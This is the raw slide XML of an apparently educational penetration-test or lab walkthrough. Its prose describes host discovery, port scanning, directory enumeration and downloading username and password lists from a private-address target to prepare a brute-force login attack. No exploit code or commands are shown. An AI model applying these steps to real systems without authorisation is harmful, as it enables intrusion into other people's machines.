          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPts val="2900"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="EEEFF5"/>
                </a:solidFill>
                <a:latin typeface="Montserrat" pitchFamily="34" charset="0"/>
                <a:ea typeface="Montserrat" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Montserrat" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>The initial phase involved using Netdiscover to find the target IP address (192.168.1.15).</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Picture 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9CB3A4CB-FA39-C6F8-74C3-6B06DD9CDB8E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1371599" y="3282235"/>
            <a:ext cx="11058331" cy="3820795"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="389009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
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EF5495EC-75A9-EB90-59FE-D16FB4D7ED71}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="653455" y="994807"/>
            <a:ext cx="526256" cy="526256"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 40000"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="282C32"/>
          </a:solidFill>
          <a:ln/>
          <a:effectLst>
            <a:outerShdw blurRad="58420" dist="29210" dir="13500000" algn="bl" rotWithShape="0">
              <a:srgbClr val="FFFFFF">
                <a:alpha val="10000"/>
              </a:srgbClr>
            </a:outerShdw>
          </a:effectLst>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Text 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4D11C6F8-5718-91A2-0ECC-AFA490DB993F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="813118" y="1073269"/>
            <a:ext cx="206812" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0" algn="ctr">
              <a:lnSpc>
                <a:spcPts val="2900"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2900" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="EEEFF5"/>
                </a:solidFill>
                <a:latin typeface="Barlow Bold" pitchFamily="34" charset="0"/>
                <a:ea typeface="Barlow Bold" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Barlow Bold" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>2</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2900" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Text 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0EA99FD7-EEAA-2305-1461-AB644D8471C1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1413550" y="994807"/>
            <a:ext cx="3077528" cy="384691"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPts val="3000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="EEEFF5"/>
                </a:solidFill>
                <a:latin typeface="Barlow Bold" pitchFamily="34" charset="0"/>
                <a:ea typeface="Barlow Bold" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Barlow Bold" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>Port Scanning</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Text 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3697CAC8-636C-E631-77D5-DB39B1E1D17B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1515150" y="1476295"/>
            <a:ext cx="6746796" cy="748189"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPts val="2900"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="EEEFF5"/>
                </a:solidFill>
                <a:latin typeface="Montserrat" pitchFamily="34" charset="0"/>
                <a:ea typeface="Montserrat" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Montserrat" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>Nmap was utilized to discover open ports and services, revealing SSH on port 22 and HTTP on port 80.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="9" name="Picture 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0AC38029-F46C-31A3-246D-9FDE8FA40029}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1019930" y="2616200"/>
            <a:ext cx="11972170" cy="4902200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1998697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
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CFDDEEF1-9311-4FA4-88D9-4B1A64DD4DBC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="805855" y="986909"/>
            <a:ext cx="526256" cy="526256"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 40000"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="282C32"/>
          </a:solidFill>
          <a:ln/>
          <a:effectLst>
            <a:outerShdw blurRad="58420" dist="29210" dir="13500000" algn="bl" rotWithShape="0">
              <a:srgbClr val="FFFFFF">
                <a:alpha val="10000"/>
              </a:srgbClr>
            </a:outerShdw>
          </a:effectLst>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Text 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C9174794-2D0A-CD08-1C6E-9F9EA247F984}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="969208" y="1065371"/>
            <a:ext cx="199430" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0" algn="ctr">
              <a:lnSpc>
                <a:spcPts val="2900"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2900" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="EEEFF5"/>
                </a:solidFill>
                <a:latin typeface="Barlow Bold" pitchFamily="34" charset="0"/>
                <a:ea typeface="Barlow Bold" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Barlow Bold" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>3</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2900" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Text 11">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F81D8D96-BFCA-8E7D-3B0F-D377A3359B34}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1565950" y="986909"/>
            <a:ext cx="3077528" cy="384691"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPts val="3000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="EEEFF5"/>
                </a:solidFill>
                <a:latin typeface="Barlow Bold" pitchFamily="34" charset="0"/>
                <a:ea typeface="Barlow Bold" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Barlow Bold" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>Information Gathering</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Text 12">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E3E4ABE6-2DB8-6AA4-F7F5-BC87C9C47F08}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1565950" y="1511856"/>
            <a:ext cx="6746796" cy="748189"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPts val="2900"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="EEEFF5"/>
                </a:solidFill>
                <a:latin typeface="Montserrat" pitchFamily="34" charset="0"/>
                <a:ea typeface="Montserrat" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Montserrat" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>This phase of the project focuses on amassing as much information as possible about the target system.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="TextBox 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{122640CE-883E-23D8-3A88-6564D7FB66CE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1068922" y="2761733"/>
            <a:ext cx="7744877" cy="830997"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="Aptos" panose="020B0004020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Using </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="Aptos" panose="020B0004020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>dirb</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="Aptos" panose="020B0004020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> to find hidden directories (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="Aptos" panose="020B0004020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>aspadmin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="Aptos" panose="020B0004020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>) on the web service.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="11" name="Picture 10" descr="A screenshot of a computer&#10;&#10;Description automatically generated">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E715AAF9-4AF2-5472-B97D-60063DDA5628}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="969208" y="3808095"/>
            <a:ext cx="12454692" cy="4307205"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="208274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397085"/>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9998FF"/>
                </a:solidFill>
                <a:latin typeface="Barlow Bold" pitchFamily="34" charset="0"/>
                <a:ea typeface="Barlow Bold" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Barlow Bold" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>Weaponization</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="5100" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Text 1"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="864037" y="3579495"/>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Dirb was used to uncover hidden directories, discovering an "aspadmin" directory on the web service.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1900" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Text 2"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="864037" y="4647248"/>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Wget was employed to download "user.list" and "password.list" files from the target server, preparing for a brute-force attack.</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A755C7DB-A271-F2D5-8E60-16673C7FE23E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="617220" y="747514"/>
            <a:ext cx="7415927" cy="1837849"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 12090"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="282C32"/>
          </a:solidFill>
          <a:ln/>
          <a:effectLst>
            <a:outerShdw blurRad="60960" dist="30480" dir="13500000" algn="bl" rotWithShape="0">
              <a:srgbClr val="FFFFFF">
                <a:alpha val="10000"/>
              </a:srgbClr>
            </a:outerShdw>
          </a:effectLst>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Text 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CD91B883-925B-B5F8-6C5A-1D362060F112}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="864036" y="994331"/>
            <a:ext cx="3261360" cy="406003"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPts val="3150"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2550" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="EEEFF5"/>
                </a:solidFill>
                <a:latin typeface="Barlow Bold" pitchFamily="34" charset="0"/>
                <a:ea typeface="Barlow Bold" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Barlow Bold" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>Directory Enumeration</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2550" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Text 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{ECA077D5-B513-D22A-B03C-E52B470D5C81}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="864036" y="1548448"/>
            <a:ext cx="6922294" cy="790099"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPts val="3100"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="EEEFF5"/>
                </a:solidFill>
                <a:latin typeface="Montserrat" pitchFamily="34" charset="0"/>
                <a:ea typeface="Montserrat" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Montserrat" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>Dirb was used to uncover hidden directories, discovering an "aspadmin" directory on the web service.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1900" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Rectangle 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C80B0A08-D2F7-124A-5C71-198A8D7640A5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="617220" y="2733477"/>
            <a:ext cx="103044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By exploring the directories we get an important file of usernames and passwords,</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="en-US" altLang="en-US" sz="1200" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="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a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2049" name="Picture 1" descr="A screenshot of a computer&#10;&#10;Description automatically generated">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A7FDC21A-90F0-69BB-7F30-B2DA50F53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186"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2451789" y="3486169"/>
            <a:ext cx="8619812" cy="39959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5756ABED-DFBE-0161-3569-67DE0A0B4325}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="617220" y="3008243"/>
            <a:ext cx="18473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a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Aptos" panose="020B0004020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Aptos" panose="020B0004020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
            </a:br>
            <a:endParaRPr kumimoji="0" lang="en-US" altLang="en-US" sz="32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08440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790099"/>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9998FF"/>
                </a:solidFill>
                <a:latin typeface="Barlow Bold" pitchFamily="34" charset="0"/>
                <a:ea typeface="Barlow Bold" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Barlow Bold" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>Delivery</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="5100" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="Image 0" descr="preencoded.png"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="864037" y="2095976"/>
            <a:ext cx="4053840" cy="2505432"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Text 1"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="864037" y="4910018"/>
            <a:ext cx="3248501" cy="406003"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0" algn="l">
              <a:lnSpc>
                <a:spcPts val="3150"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2550" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="EEEFF5"/>
                </a:solidFill>
                <a:latin typeface="Barlow Bold" pitchFamily="34" charset="0"/>
                <a:ea typeface="Barlow Bold" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Barlow Bold" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>Login Page Capture</a:t>
            </a:r>
